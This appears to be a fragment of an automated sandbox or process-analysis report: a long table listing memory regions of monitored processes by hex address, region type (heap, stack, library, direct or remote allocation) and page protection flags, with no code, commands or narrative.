heap
|
page read and write
|
||
|
4CD9000
|
heap
|
page read and write
|
||
|
26CD64A0000
|
trusted library allocation
|
page read and write
|
||
|
6FF0000
|
trusted library allocation
|
page read and write
|
||
|
FD7B19A000
|
stack
|
page read and write
|
||
|
6658000
|
heap
|
page read and write
|
||
|
4CE9000
|
heap
|
page read and write
|
||
|
27D86BDB000
|
heap
|
page read and write
|
||
|
22570000
|
unclassified section
|
page execute and read and write
|
||
|
4D2C000
|
heap
|
page read and write
|
||
|
FD7B5FE000
|
stack
|
page read and write
|
||
|
4CE8000
|
heap
|
page read and write
|
||
|
662E000
|
stack
|
page read and write
|
||
|
FD7B9FC000
|
stack
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
4EC1000
|
heap
|
page read and write
|
||
|
ABF000
|
heap
|
page read and write
|
||
|
665F000
|
heap
|
page read and write
|
||
|
4EC1000
|
heap
|
page read and write
|
||
|
6E60000
|
trusted library allocation
|
page read and write
|
||
|
224DF000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page readonly
|
||
|
7D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
222D0000
|
heap
|
page read and write
|
||
|
4CCE000
|
heap
|
page read and write
|
||
|
27D84CF7000
|
heap
|
page read and write
|
||
|
27D84D7C000
|
heap
|
page read and write
|
||
|
26CD4C35000
|
heap
|
page read and write
|
||
|
6661000
|
heap
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
1E5A79F0000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
2700000
|
trusted library allocation
|
page read and write
|
||
|
26CD6496000
|
heap
|
page read and write
|
||
|
277E000
|
stack
|
page read and write
|
||
|
4CD7000
|
heap
|
page read and write
|
||
|
2D9C000
|
stack
|
page read and write
|
||
|
4ED9000
|
heap
|
page read and write
|
||
|
223C2000
|
heap
|
page read and write
|
||
|
4CDC000
|
heap
|
page read and write
|
||
|
2ECE000
|
stack
|
page read and write
|
||
|
956C000
|
direct allocation
|
page execute and read and write
|
||
|
27D84D20000
|
heap
|
page read and write
|
||
|
21DEE000
|
stack
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
2ECC000
|
stack
|
page read and write
|
||
|
27D86D56000
|
heap
|
page read and write
|
||
|
2D83000
|
stack
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
2EE7000
|
stack
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
|
26CEED04000
|
heap
|
page read and write
|
||
|
5407000
|
trusted library allocation
|
page read and write
|
||
|
6D70000
|
trusted library allocation
|
page read and write
|
||
|
54B1000
|
heap
|
page read and write
|
||
|
22760000
|
unclassified section
|
page execute and read and write
|
||
|
32CE000
|
stack
|
page read and write
|
||
|
4ED4000
|
heap
|
page read and write
|
||
|
4CC1000
|
heap
|
page read and write
|
||
|
4CD3000
|
heap
|
page read and write
|
||
|
221D1000
|
heap
|
page read and write
|
||
|
224B7000
|
heap
|
page read and write
|
||
|
26CD4A35000
|
heap
|
page read and write
|
||
|
27D86BDB000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
1E5A78FB000
|
heap
|
page read and write
|
||
|
27D86D77000
|
heap
|
page read and write
|
||
|
325F000
|
stack
|
page read and write
|
||
|
21F3F000
|
stack
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
6FD0000
|
trusted library allocation
|
page read and write
|
||
|
27D86780000
|
heap
|
page read and write
|
||
|
307D000
|
heap
|
page read and write
|
||
|
27D86D1D000
|
heap
|
page read and write
|
||
|
54B1000
|
heap
|
page read and write
|
||
|
2BAF000
|
stack
|
page read and write
|
||
|
7DAB07F000
|
stack
|
page read and write
|
||
|
21FBF000
|
stack
|
page read and write
|
||
|
26CEEDEE000
|
heap
|
page read and write
|
||
|
26CD4A60000
|
heap
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
53B0000
|
heap
|
page read and write
|
||
|
6C30000
|
heap
|
page read and write
|
||
|
27D86D1D000
|
heap
|
page read and write
|
||
|
1E5A78A0000
|
heap
|
page read and write
|
||
|
26CD6A44000
|
trusted library allocation
|
page read and write
|
||
|
7DAC18B000
|
stack
|
page read and write
|
||
|
263F000
|
stack
|
page read and write
|
||
|
27D86DA8000
|
heap
|
page read and write
|
||
|
2243B000
|
heap
|
page read and write
|
||
|
2FC8000
|
heap
|
page read and write
|
||
|
4D47000
|
heap
|
page read and write
|
||
|
27D86DC0000
|
heap
|
page read and write
|
||
|
27D86DA8000
|
heap
|
page read and write
|
||
|
27D84D7E000
|
heap
|
page read and write
|
||
|
2210B000
|
unclassified section
|
page execute and read and write
|
||
|
4EE8000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
4CCE000
|
heap
|
page read and write
|
||
|
2EEC000
|
stack
|
page read and write
|
||
|
26CE65D1000
|
trusted library allocation
|
page read and write
|
||
|
26CD83EC000
|
trusted library allocation
|
page read and write
|
||
|
4ED9000
|
heap
|
page read and write
|
||
|
4ED1000
|
heap
|
page read and write
|
||
|
26CD83E6000
|
trusted library allocation
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
6A2E000
|
stack
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
4FCC000
|
remote allocation
|
page execute and read and write
|
||
|
3670000
|
trusted library allocation
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
366E000
|
stack
|
page read and write
|
||
|
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
|
4ED1000
|
heap
|
page read and write
|
||
|
27D84D7C000
|
heap
|
page read and write
|
||
|
27D86BC1000
|
heap
|
page read and write
|
||
|
2273C000
|
unclassified section
|
page execute and read and write
|
||
|
7B10000
|
heap
|
page read and write
|
||
|
54C0000
|
trusted library allocation
|
page read and write
|
||
|
6DDD000
|
trusted library allocation
|
page read and write
|
||
|
3278000
|
heap
|
page read and write
|
||
|
6F6E000
|
stack
|
page read and write
|
||
|
28B0000
|
heap
|
page read and write
|
||
|
5271000
|
trusted library allocation
|
page read and write
|
||
|
4CDD000
|
heap
|
page read and write
|
||
|
27D86D37000
|
heap
|
page read and write
|
||
|
223C3000
|
heap
|
page read and write
|
||
|
8A00000
|
direct allocation
|
page execute and read and write
|
||
|
27D86E10000
|
heap
|
page read and write
|
||
|
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
|
22790000
|
direct allocation
|
page read and write
|
||
|
2FDC000
|
heap
|
page read and write
|
||
|
6DC0000
|
trusted library allocation
|
page read and write
|
||
|
2277B000
|
unclassified section
|
page execute and read and write
|
||
|
2F80000
|
heap
|
page readonly
|
||
|
27D86E3F000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
26CD4A7A000
|
heap
|
page read and write
|
||
|
223C3000
|
heap
|
page read and write
|
||
|
313E000
|
stack
|
page read and write
|
||
|
4D4A000
|
heap
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
6E50000
|
trusted library allocation
|
page read and write
|
||
|
7DAC10B000
|
stack
|
page read and write
|
||
|
316E000
|
stack
|
page read and write
|
||
|
666C000
|
heap
|
page read and write
|
||
|
2F3F000
|
stack
|
page read and write
|
||
|
56B0000
|
trusted library allocation
|
page read and write
|
||
|
54B9000
|
heap
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
26CD6480000
|
heap
|
page readonly
|
||
|
3210000
|
heap
|
page read and write
|
||
|
27D850A0000
|
heap
|
page read and write
|
||
|
25FE000
|
stack
|
page read and write
|
||
|
26CD6490000
|
heap
|
page read and write
|
||
|
21B00000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
224B5000
|
heap
|
page read and write
|
||
|
30F5000
|
heap
|
page read and write
|
||
|
4CD9000
|
heap
|
page read and write
|
||
|
4EDC000
|
heap
|
page read and write
|
||
|
6C4E000
|
heap
|
page read and write
|
||
|
26CD6D08000
|
trusted library allocation
|
page read and write
|
||
|
4CD9000
|
heap
|
page read and write
|
||
|
21FFD000
|
stack
|
page read and write
|
||
|
21D1E000
|
stack
|
page read and write
|
||
|
222D1000
|
heap
|
page read and write
|
||
|
50C000
|
stack
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
220BF000
|
stack
|
page read and write
|
||
|
7F1B000
|
stack
|
page read and write
|
||
|
9E0000
|
heap
|
page read and write
|
||
|
33AE000
|
stack
|
page read and write
|
||
|
7DAB43E000
|
stack
|
page read and write
|
||
|
26CE65E0000
|
trusted library allocation
|
page read and write
|
||
|
26CEED18000
|
heap
|
page read and write
|
||
|
4ED4000
|
heap
|
page read and write
|
||
|
4D57000
|
heap
|
page read and write
|
||
|
27D84D7E000
|
heap
|
page read and write
|
||
|
34AF000
|
stack
|
page read and write
|
||
|
7BA7000
|
heap
|
page read and write
|
||
|
4F4A000
|
heap
|
page read and write
|
||
|
4ED6000
|
heap
|
page read and write
|
||
|
26CD846E000
|
trusted library allocation
|
page read and write
|
||
|
51CE000
|
heap
|
page read and write
|
||
|
4ED9000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
30F5000
|
heap
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
4CCC000
|
heap
|
page read and write
|
||
|
26E5000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CCA000
|
heap
|
page read and write
|
||
|
227C0000
|
heap
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
2246B000
|
heap
|
page read and write
|
||
|
C3E000
|
stack
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
4EC8000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
226BD000
|
unclassified section
|
page execute and read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
224CE000
|
heap
|
page read and write
|
||
|
6DD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
21C5D000
|
stack
|
page read and write
|
||
|
21C9B000
|
stack
|
page read and write
|
||
|
2FE2000
|
heap
|
page read and write
|
||
|
26CD6E20000
|
trusted library allocation
|
page read and write
|
||
|
2E18000
|
heap
|
page read and write
|
||
|
4ED1000
|
heap
|
page read and write
|
||
|
7ACD000
|
stack
|
page read and write
|
||
|
26A0000
|
trusted library allocation
|
page read and write
|
||
|
21740000
|
direct allocation
|
page read and write
|
||
|
26DA000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D86D80000
|
heap
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
27D86D3E000
|
heap
|
page read and write
|
||
|
A90000
|
heap
|
page read and write
|
||
|
7DAAFFF000
|
stack
|
page read and write
|
||
|
4A21000
|
heap
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CD8000
|
heap
|
page read and write
|
||
|
4EC8000
|
heap
|
page read and write
|
||
|
4CC0000
|
heap
|
page read and write
|
||
|
2DD9000
|
stack
|
page read and write
|
||
|
27D86CF7000
|
heap
|
page read and write
|
||
|
6C9D000
|
heap
|
page read and write
|
||
|
4ED9000
|
heap
|
page read and write
|
||
|
4F4A000
|
heap
|
page read and write
|
||
|
53BF000
|
heap
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
7B99000
|
heap
|
page read and write
|
||
|
224CD000
|
heap
|
page read and write
|
||
|
54B0000
|
heap
|
page read and write
|
||
|
221D0000
|
heap
|
page read and write
|
||
|
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
|
4100000
|
trusted library allocation
|
page read and write
|
||
|
34F0000
|
heap
|
page read and write
|
||
|
225F0000
|
unclassified section
|
page execute and read and write
|
||
|
69D0000
|
direct allocation
|
page read and write
|
||
|
ABE000
|
heap
|
page read and write
|
||
|
26CD6440000
|
trusted library allocation
|
page read and write
|
||
|
21F7C000
|
stack
|
page read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
26CD6460000
|
trusted library allocation
|
page read and write
|
||
|
3355000
|
heap
|
page read and write
|
||
|
21EBD000
|
stack
|
page read and write
|
||
|
26CD6E58000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
27D84DDB000
|
heap
|
page read and write
|
||
|
4CCD000
|
heap
|
page read and write
|
||
|
6FE0000
|
trusted library allocation
|
page read and write
|
||
|
4ED1000
|
heap
|
page read and write
|
||
|
27D86D77000
|
heap
|
page read and write
|
||
|
26CD4AA2000
|
heap
|
page read and write
|
||
|
3355000
|
heap
|
page read and write
|
||
|
AAE000
|
heap
|
page read and write
|
||
|
2D40000
|
heap
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
323F000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
4CCD000
|
heap
|
page read and write
|
||
|
4ED8000
|
heap
|
page read and write
|
||
|
67B0000
|
direct allocation
|
page read and write
|
||
|
27D86E3F000
|
heap
|
page read and write
|
||
|
54B9000
|
heap
|
page read and write
|
||
|
6661000
|
heap
|
page read and write
|
||
|
22DD000
|
stack
|
page read and write
|
||
|
26CD6DF7000
|
trusted library allocation
|
page read and write
|
||
|
4EE3000
|
heap
|
page read and write
|
||
|
27D86BC1000
|
heap
|
page read and write
|
||
|
6D18000
|
heap
|
page read and write
|
||
|
6780000
|
direct allocation
|
page read and write
|
||
|
3297000
|
heap
|
page read and write
|
||
|
7A27000
|
stack
|
page read and write
|
||
|
8B6C000
|
direct allocation
|
page execute and read and write
|
||
|
4CD0000
|
heap
|
page read and write
|
||
|
26CEEAF7000
|
heap
|
page execute and read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
4EEC000
|
heap
|
page read and write
|
||
|
FD7B7FF000
|
stack
|
page read and write
|
||
|
273E000
|
unkown
|
page read and write
|
||
|
6C80000
|
heap
|
page read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
26CEEAF0000
|
heap
|
page execute and read and write
|
||
|
4EE9000
|
heap
|
page read and write
|
||
|
4ED0000
|
heap
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
4CC8000
|
heap
|
page read and write
|
||
|
52C8000
|
heap
|
page read and write
|
||
|
36F9000
|
heap
|
page read and write
|
||
|
4ED9000
|
heap
|
page read and write
|
||
|
4CCC000
|
heap
|
page read and write
|
||
|
27D86D36000
|
heap
|
page read and write
|
||
|
27D86BCF000
|
heap
|
page read and write
|
||
|
4EC5000
|
heap
|
page read and write
|
||
|
21B5E000
|
stack
|
page read and write
|
||
|
26CD4C10000
|
heap
|
page read and write
|
||
|
27D86DA7000
|
heap
|
page read and write
|
||
|
1E5A78C0000
|
heap
|
page read and write
|
||
|
27B0000
|
heap
|
page read and write
|
||
|
4C1F000
|
stack
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
27D86D63000
|
heap
|
page read and write
|
||
|
4F47000
|
heap
|
page read and write
|
||
|
7000000
|
trusted library allocation
|
page read and write
|
||
|
274E000
|
stack
|
page read and write
|
||
|
27D86E9B000
|
heap
|
page read and write
|
||
|
4F57000
|
heap
|
page read and write
|
||
|
7040000
|
trusted library allocation
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
4EC1000
|
heap
|
page read and write
|
||
|
4EEB000
|
heap
|
page read and write
|
||
|
2D7F000
|
stack
|
page read and write
|
||
|
25BE000
|
stack
|
page read and write
|
||
|
26CD6E69000
|
trusted library allocation
|
page read and write
|
||
|
4CC0000
|
heap
|
page read and write
|
||
|
26CE68CC000
|
trusted library allocation
|
page read and write
|
||
|
4CD3000
|
heap
|
page read and write
|
||
|
4CE3000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
4EA0000
|
heap
|
page read and write
|
||
|
9F0000
|
heap
|
page readonly
|
||
|
26CEEB12000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
52C4000
|
heap
|
page read and write
|
||
|
6661000
|
heap
|
page read and write
|
||
|
7B50000
|
heap
|
page read and write
|
||
|
6CBC000
|
heap
|
page read and write
|
||
|
4EC0000
|
heap
|
page read and write
|
||
|
4EE8000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
7020000
|
trusted library allocation
|
page read and write
|
||
|
27D86D53000
|
heap
|
page read and write
|
||
|
328F000
|
stack
|
page read and write
|
||
|
26CEEB00000
|
heap
|
page read and write
|
||
|
4ED9000
|
heap
|
page read and write
|
||
|
56B0000
|
trusted library allocation
|
page read and write
|
||
|
26BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
30F5000
|
heap
|
page read and write
|
||
|
4D4A000
|
heap
|
page read and write
|
||
|
805D000
|
stack
|
page read and write
|
||
|
4EDD000
|
heap
|
page read and write
|
||
|
41DE000
|
stack
|
page read and write
|
||
|
4D57000
|
heap
|
page read and write
|
||
|
4F57000
|
heap
|
page read and write
|
||
|
80D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
4F2C000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
7010000
|
trusted library allocation
|
page read and write
|
||
|
4185000
|
heap
|
page execute and read and write
|
||
|
352F000
|
stack
|
page read and write
|
||
|
27D84D1F000
|
heap
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
6DF0000
|
heap
|
page execute and read and write
|
||
|
4D1A000
|
heap
|
page read and write
|
||
|
415E000
|
stack
|
page read and write
|
||
|
51C1000
|
heap
|
page read and write
|
||
|
4CC0000
|
heap
|
page read and write
|
||
|
27D86BDC000
|
heap
|
page read and write
|
||
|
27D866E0000
|
remote allocation
|
page read and write
|
||
|
6DE0000
|
trusted library allocation
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
286D000
|
heap
|
page read and write
|
||
|
2F33000
|
heap
|
page read and write
|
||
|
26CD4A5C000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
26CD6A84000
|
trusted library allocation
|
page read and write
|
||
|
4CD3000
|
heap
|
page read and write
|
||
|
278E000
|
stack
|
page read and write
|
||
|
26CEED00000
|
heap
|
page read and write
|
||
|
27D86D74000
|
heap
|
page read and write
|
||
|
4CD3000
|
heap
|
page read and write
|
||
|
22248000
|
heap
|
page read and write
|
||
|
31AC000
|
heap
|
page read and write
|
||
|
26CEED82000
|
heap
|
page read and write
|
||
|
7DF4DF7D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
26CEEB66000
|
heap
|
page read and write
|
||
|
4CD9000
|
heap
|
page read and write
|
||
|
A98000
|
heap
|
page read and write
|
||
|
665F000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
6760000
|
direct allocation
|
page read and write
|
||
|
22248000
|
heap
|
page read and write
|
||
|
4CDC000
|
heap
|
page read and write
|
||
|
27D86E3E000
|
heap
|
page read and write
|
||
|
224B7000
|
heap
|
page read and write
|
||
|
2264C000
|
unclassified section
|
page execute and read and write
|
||
|
6663000
|
heap
|
page read and write
|
||
|
224B7000
|
heap
|
page read and write
|
||
|
4CCC000
|
heap
|
page read and write
|
||
|
30F5000
|
heap
|
page read and write
|
||
|
4EC1000
|
heap
|
page read and write
|
||
|
26CE65F1000
|
trusted library allocation
|
page read and write
|
||
|
3355000
|
heap
|
page read and write
|
||
|
21D5F000
|
stack
|
page read and write
|
||
|
27D86CF3000
|
heap
|
page read and write
|
||
|
7050000
|
trusted library allocation
|
page read and write
|
||
|
4CD4000
|
heap
|
page read and write
|
||
|
27D866E0000
|
remote allocation
|
page read and write
|
||
|
224B5000
|
heap
|
page read and write
|
||
|
7B81000
|
heap
|
page read and write
|
||
|
1E5A78F0000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
36F0000
|
heap
|
page read and write
|
||
|
54C0000
|
trusted library allocation
|
page read and write
|
||
|
6662000
|
heap
|
page read and write
|
||
|
4CC5000
|
heap
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page execute and read and write
|
||
|
6FAD000
|
stack
|
page read and write
|
||
|
54B8000
|
heap
|
page read and write
|
||
|
26CD7869000
|
trusted library allocation
|
page read and write
|
||
|
3068000
|
heap
|
page read and write
|
||
|
666E000
|
stack
|
page read and write
|
||
|
4EC0000
|
heap
|
page read and write
|
||
|
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
|
27D84DAF000
|
heap
|
page read and write
|
||
|
4CD3000
|
heap
|
page read and write
|
||
|
26CEEC25000
|
heap
|
page read and write
|
||
|
6662000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
52C8000
|
heap
|
page read and write
|
||
|
6790000
|
direct allocation
|
page read and write
|
||
|
90E000
|
stack
|
page read and write
|
||
|
52DB000
|
trusted library allocation
|
page read and write
|
||
|
7DAB5BB000
|
stack
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
27D86D53000
|
heap
|
page read and write
|
||
|
687E000
|
stack
|
page read and write
|
||
|
2D67000
|
stack
|
page read and write
|
||
|
4CD7000
|
heap
|
page read and write
|
||
|
6D0E000
|
heap
|
page read and write
|
||
|
6D80000
|
trusted library allocation
|
page read and write
|
||
|
2F3D000
|
heap
|
page read and write
|
||
|
27D850A5000
|
heap
|
page read and write
|
||
|
FD7BCFF000
|
stack
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
52C1000
|
heap
|
page read and write
|
||
|
FD7B8FF000
|
stack
|
page read and write
|
||
|
30F5000
|
heap
|
page read and write
|
||
|
56B0000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
27D84D3A000
|
heap
|
page read and write
|
||
|
27D86BDC000
|
heap
|
page read and write
|
||
|
30F5000
|
heap
|
page read and write
|
||
|
4EF9000
|
heap
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
27D86CDE000
|
heap
|
page read and write
|
||
|
56B0000
|
trusted library allocation
|
page read and write
|
||
|
225E3000
|
unclassified section
|
page execute and read and write
|
||
|
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
|
53B1000
|
heap
|
page read and write
|
||
|
7DAB4BF000
|
stack
|
page read and write
|
||
|
27D86CE8000
|
heap
|
page read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
4CCE000
|
heap
|
page read and write
|
||
|
26CEEB68000
|
heap
|
page read and write
|
||
|
3670000
|
trusted library allocation
|
page read and write
|
||
|
27D84CF0000
|
heap
|
page read and write
|
||
|
27D86D80000
|
heap
|
page read and write
|
||
|
30F0000
|
heap
|
page read and write
|
||
|
4F47000
|
heap
|
page read and write
|
||
|
27D86D2F000
|
heap
|
page read and write
|
||
|
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
|
6D40000
|
trusted library allocation
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
27D84DDB000
|
heap
|
page read and write
|
||
|
54C0000
|
trusted library allocation
|
page read and write
|
||
|
2203F000
|
stack
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
4ED9000
|
heap
|
page read and write
|
||
|
2620000
|
heap
|
page read and write
|
||
|
69E0000
|
direct allocation
|
page read and write
|
||
|
222C2000
|
heap
|
page read and write
|
||
|
52C1000
|
heap
|
page read and write
|
||
|
36F9000
|
heap
|
page read and write
|
||
|
6661000
|
heap
|
page read and write
|
||
|
4CCC000
|
heap
|
page read and write
|
||
|
27D84D2F000
|
heap
|
page read and write
|
||
|
7BA3000
|
heap
|
page read and write
|
||
|
4271000
|
trusted library allocation
|
page read and write
|
||
|
6E40000
|
trusted library allocation
|
page execute and read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
4CD4000
|
heap
|
page read and write
|
||
|
27D86D3E000
|
heap
|
page read and write
|
||
|
222D1000
|
heap
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
4CC0000
|
heap
|
page read and write
|
||
|
2FCE000
|
stack
|
page read and write
|
||
|
4CC1000
|
heap
|
page read and write
|
||
|
69F0000
|
direct allocation
|
page read and write
|
||
|
4ED0000
|
heap
|
page read and write
|
||
|
27D86BDC000
|
heap
|
page read and write
|
||
|
7BAB000
|
heap
|
page read and write
|
||
|
224B5000
|
heap
|
page read and write
|
||
|
4EDB000
|
heap
|
page read and write
|
||
|
4CD9000
|
heap
|
page read and write
|
||
|
2243B000
|
heap
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
51C1000
|
heap
|
page read and write
|
||
|
27D86BC0000
|
heap
|
page read and write
|
||
|
36FA000
|
heap
|
page read and write
|
||
|
4CDB000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
27D84D87000
|
heap
|
page read and write
|
||
|
4A21000
|
heap
|
page read and write
|
||
|
26CD4BF0000
|
heap
|
page read and write
|
||
|
6EEB000
|
stack
|
page read and write
|
||
|
666C000
|
heap
|
page read and write
|
||
|
2690000
|
trusted library section
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page execute and read and write
|
||
|
34FA000
|
heap
|
page read and write
|
||
|
1E5A7BC0000
|
heap
|
page read and write
|
||
|
4CC1000
|
heap
|
page read and write
|
||
|
4ED0000
|
heap
|
page read and write
|
||
|
26CEEDCC000
|
heap
|
page read and write
|
||
|
32BE000
|
stack
|
page read and write
|
||
|
4ED1000
|
heap
|
page read and write
|
||
|
5506D3D000
|
stack
|
page read and write
|
||
|
27D86D80000
|
heap
|
page read and write
|
||
|
3313000
|
heap
|
page read and write
|
||
|
36FE000
|
heap
|
page read and write
|
||
|
6B42000
|
heap
|
page read and write
|
||
|
6A30000
|
heap
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
4ED9000
|
heap
|
page read and write
|
||
|
54B1000
|
heap
|
page read and write
|
||
|
224B7000
|
heap
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
4CCC000
|
heap
|
page read and write
|
||
|
2A50000
|
trusted library allocation
|
page execute and read and write
|
||
|
4ED1000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
4D0E000
|
heap
|
page read and write
|
||
|
7DAB53E000
|
stack
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
22248000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
2D4C000
|
stack
|
page read and write
|
||
|
4ED1000
|
heap
|
page read and write
|
||
|
4CD9000
|
heap
|
page read and write
|
||
|
5071000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
26CD4C30000
|
heap
|
page read and write
|
||
|
27D86D1D000
|
heap
|
page read and write
|
||
|
27D84D20000
|
heap
|
page read and write
|
||
|
42CD000
|
trusted library allocation
|
page read and write
|
||
|
4D40000
|
heap
|
page read and write
|
||
|
4D4A000
|
heap
|
page read and write
|
||
|
40FE000
|
stack
|
page read and write
|
||
|
26CD85D2000
|
trusted library allocation
|
page read and write
|
||
|
27D86D6A000
|
heap
|
page read and write
|
||
|
56B0000
|
trusted library allocation
|
page read and write
|
||
|
26CD6498000
|
heap
|
page read and write
|
||
|
27D86D49000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
2790000
|
heap
|
page readonly
|
||
|
7FD0000
|
trusted library allocation
|
page read and write
|
||
|
331C000
|
heap
|
page read and write
|
||
|
4EDD000
|
heap
|
page read and write
|
||
|
6750000
|
direct allocation
|
page read and write
|
||
|
26CEEB03000
|
heap
|
page read and write
|
||
|
4ED9000
|
heap
|
page read and write
|
||
|
27D86D1D000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
51C0000
|
heap
|
page read and write
|
||
|
26CEED08000
|
heap
|
page read and write
|
||
|
27D86D4B000
|
heap
|
page read and write
|
||
|
27D84D5B000
|
heap
|
page read and write
|
||
|
2AAF000
|
unkown
|
page read and write
|
||
|
2224A000
|
heap
|
page read and write
|
||
|
7FB0000
|
trusted library allocation
|
page read and write
|
||
|
7F9C000
|
stack
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
8070000
|
direct allocation
|
page read and write
|
||
|
C54000
|
heap
|
page read and write
|
||
|
56B0000
|
trusted library allocation
|
page read and write
|
||
|
52C9000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
4CF9000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
227A6000
|
direct allocation
|
page execute and read and write
|
||
|
4F57000
|
heap
|
page read and write
|
||
|
665F000
|
heap
|
page read and write
|
||
|
288B000
|
heap
|
page read and write
|
||
|
7BE1000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
22646000
|
unclassified section
|
page execute and read and write
|
||
|
224C9000
|
heap
|
page read and write
|
||
|
30F4000
|
